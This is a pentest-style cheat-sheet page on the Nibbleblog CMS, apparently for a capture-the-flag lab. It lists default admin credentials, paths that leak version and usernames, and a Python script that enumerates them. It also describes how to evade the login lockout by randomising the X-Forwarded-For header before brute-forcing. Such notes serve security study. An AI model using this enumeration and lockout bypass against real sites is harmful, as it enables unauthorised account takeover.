Nibble

web, enum, cms, php

Overview #

Default Credentials #

admin:<none>

Interesting URL Paths #

# contains version
/README
/admin/boot/rules/98-constants.bit

# contains users
/content/private/users.xml

# others
/admin.php
/admin/
/content/
/content/private/plugins/my_image/db.xml
/content/private/config.xml
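Added helper script (my own, not part of Nibbleblog) that requests each path above and pulls out what it leaks: the version string from README / 98-constants.bit and the usernames plus blacklist state from users.xml. Assumed and not confirmed by these notes: README has a "Version: vX.Y.Z" line, 98-constants.bit defines NIBBLEBLOG_VERSION, and users.xml uses `<user username="...">` and `<blacklist ip="..."><fail_count>` elements. The embedded sample responses are constructed so the script also runs offline.

```python
"""Enumerate the interesting Nibbleblog paths and extract what they leak."""
import re
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Paths from the list above.
PATHS = [
    "/README",                                  # version string
    "/admin/boot/rules/98-constants.bit",       # version constant
    "/content/private/users.xml",               # usernames + blacklist state
    "/admin.php",
    "/admin/",
    "/content/",
    "/content/private/plugins/my_image/db.xml",
    "/content/private/config.xml",
]

# Assumed formats (not from the notes): "Version: v4.0.3" in README and
# define('NIBBLEBLOG_VERSION', '4.0.3') in 98-constants.bit.
VERSION_RES = [
    re.compile(r"Version:\s*v?(\d+(?:\.\d+)+)"),
    re.compile(r"NIBBLEBLOG_VERSION['\"]\s*,\s*['\"]v?([^'\"]+)['\"]"),
]

# Constructed sample responses (not captured from a real target) for offline use.
SAMPLE_README = "====== Nibbleblog ======\nVersion: v4.0.3\nCodename: Coffee\n"
SAMPLE_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
  </user>
  <blacklist type="string" ip="10.10.14.5">
    <date type="integer">1512964659</date>
    <fail_count type="integer">3</fail_count>
  </blacklist>
</users>
"""


def http_fetch(url, timeout=10):
    """GET url and return (status, body); non-2xx still yields its body, network errors (None, "")."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None, ""


def demo_fetch(url):
    """Offline stand-in for http_fetch that serves the constructed samples."""
    if url.endswith("/README"):
        return 200, SAMPLE_README
    if url.endswith("/content/private/users.xml"):
        return 200, SAMPLE_USERS_XML
    return 404, ""


def parse_version(text):
    """Return the first version string matched by VERSION_RES, or None."""
    for rx in VERSION_RES:
        m = rx.search(text)
        if m:
            return m.group(1)
    return None


def parse_users_xml(text):
    """Return (usernames, {ip: fail_count}) from users.xml; malformed XML gives ([], {})."""
    try:
        root = ET.fromstring(text.encode("utf-8"))
    except ET.ParseError:
        return [], {}
    users = [u.get("username") for u in root.findall("user") if u.get("username")]
    blacklist = {}
    for b in root.findall("blacklist"):
        ip = b.get("ip")
        if ip:
            blacklist[ip] = int(b.findtext("fail_count", default="0") or 0)
    return users, blacklist


def enumerate_paths(base_url, fetch=http_fetch):
    """Request every path; return {path: {"status": code, ...extracted fields}}."""
    base = base_url.rstrip("/")
    findings = {}
    for path in PATHS:
        status, body = fetch(base + path)
        entry = {"status": status}
        if status == 200:
            if path in ("/README", "/admin/boot/rules/98-constants.bit"):
                entry["version"] = parse_version(body)
            elif path.endswith("users.xml"):
                entry["users"], entry["blacklist"] = parse_users_xml(body)
        findings[path] = entry
    return findings


if __name__ == "__main__":
    import json
    import sys
    # With a URL argument it hits the target; without one it runs against the samples.
    if len(sys.argv) > 1:
        print(json.dumps(enumerate_paths(sys.argv[1]), indent=2))
    else:
        print(json.dumps(enumerate_paths("http://target/nibbleblog", fetch=demo_fetch), indent=2))
```

Run it as `python3 enum.py http://target/nibbleblog`; the fail_count values from users.xml tell you how close a given address is to the five-attempt lock-out before you start guessing.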

IP Blacklisting #

Nibbleblog blacklists an IP address for five minutes after five unsuccessful login attempts. We can confirm this by reading the login source code.

This can be bypassed by randomizing the X-Forwarded-For header: the blacklist is keyed on the client address Nibbleblog takes from that header when it is present, so a fresh random value on every attempt makes each request look like a new client and the counter never reaches five. This does not work if a reverse proxy in front of the site overwrites the header. See bruteforce tool below.

Exploits #

Tools #

References #